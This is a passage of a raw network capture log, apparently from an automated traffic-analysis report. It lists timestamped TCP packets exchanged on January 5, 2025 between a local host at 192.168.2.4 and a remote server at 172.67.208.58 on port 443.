                                                                                                                                                                                              Jan 5, 2025 18:08:32.985337973 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:32.985373020 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:32.985379934 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:32.985404968 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:32.985974073 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:32.985992908 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:32.986027002 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:32.986032009 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:32.986051083 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:32.986779928 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:32.986800909 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:32.986836910 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:32.986844063 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:32.986864090 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:32.987857103 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:32.987874985 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:32.987931013 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:32.987938881 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:32.987951994 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:32.987967968 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:32.987992048 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:32.987998962 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:32.988024950 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:32.988042116 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:32.988045931 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:32.989439964 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:32.989461899 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:32.989487886 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:32.989496946 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:32.989543915 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.073088884 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.073115110 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.073189020 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.073261023 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.073297977 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.073556900 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.073577881 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.073616028 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.073636055 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.073661089 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.073972940 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.073990107 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.074045897 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.074065924 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.074126959 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.077749014 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.077764034 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.077850103 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.077866077 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.077920914 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.078145981 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.078161955 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.078227997 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.078243017 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.078298092 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.078706980 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.078722954 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.078779936 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.078794003 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.078855991 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.079229116 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.079272032 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.079302073 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.079341888 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.079349041 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.079365969 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.079389095 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.079433918 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.161813974 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.161837101 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.161915064 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.161998987 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.162026882 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.162048101 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.162053108 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.162070990 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.162102938 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.162137032 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.162270069 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.162287951 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.162339926 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.162357092 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.162419081 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.162524939 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.162539959 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.162601948 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.162617922 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.162647963 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.162672043 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.162956953 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.162985086 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163033962 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163048029 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163083076 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163096905 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163104057 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163115978 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163142920 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163153887 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163196087 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163202047 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163253069 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163372040 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163419962 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163433075 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163434029 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163444996 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163472891 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163496017 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163655043 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163670063 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163722992 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163731098 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.163810015 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.168598890 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.250381947 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.250458956 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.250467062 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.250674963 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.250693083 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.250734091 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.250741005 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.250757933 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.250760078 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.250806093 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.250809908 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.250858068 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.250983000 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251003027 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251041889 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251046896 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251058102 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251075983 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251104116 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251107931 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251310110 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251343012 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251368046 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251374006 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251401901 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251559973 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251594067 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251617908 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251624107 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251651049 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251677990 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251940966 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.251986027 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.252002954 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.252007961 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.252053976 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.252249002 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.252264977 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.252310991 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.252317905 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.252356052 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.252393007 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.252449989 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.252465963 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.252506971 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.252512932 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.252547979 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.252571106 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.335700035 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339368105 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339391947 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339445114 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339459896 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339489937 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339512110 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339639902 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339654922 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339690924 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339696884 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339737892 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339752913 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339766979 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339799881 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339807034 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339831114 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339833021 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339859009 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339865923 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.339898109 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.340121984 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.340142012 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.340174913 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.340183020 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.340223074 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.340378046 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.340393066 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.340444088 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.340452909 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.340651989 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.340672970 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.340698957 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.340707064 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.340734959 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.341187000 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.341228008 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.341243029 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.341250896 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.341290951 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.341495037 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.341512918 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.341545105 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.341552019 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.341578960 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.341603994 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.430905104 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.430938005 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.430988073 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.431014061 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.431031942 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.431066036 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.431227922 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.431257010 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.431288004 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.431293011 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.431328058 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.431345940 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.431996107 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.432044029 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.432054996 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.432060003 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.432102919 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.432912111 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.432940006 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.432970047 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.432977915 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433007002 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433032036 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433228016 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433244944 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433290958 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433300018 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433312893 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433331966 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433340073 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433346033 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433370113 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433402061 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433403015 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433414936 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433432102 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433449030 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433454990 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433479071 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433495998 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433504105 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433511019 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433533907 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433564901 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433582067 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433612108 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.433638096 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.558494091 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.558515072 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.558584929 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.568269968 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.568281889 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.568320036 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.568336964 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.568413019 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.568422079 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.568444967 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.568480968 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.568489075 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.568562984 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.568620920 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.608144045 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.608176947 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.608227015 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.608299017 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.608340979 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.608340979 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.608366013 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.608412027 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.608428001 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.608468056 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.608540058 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.608577967 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.608592987 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.608608961 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.608625889 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.608675003 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:33.608913898 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:33.608936071 CET44349758172.67.208.58192.168.2.4
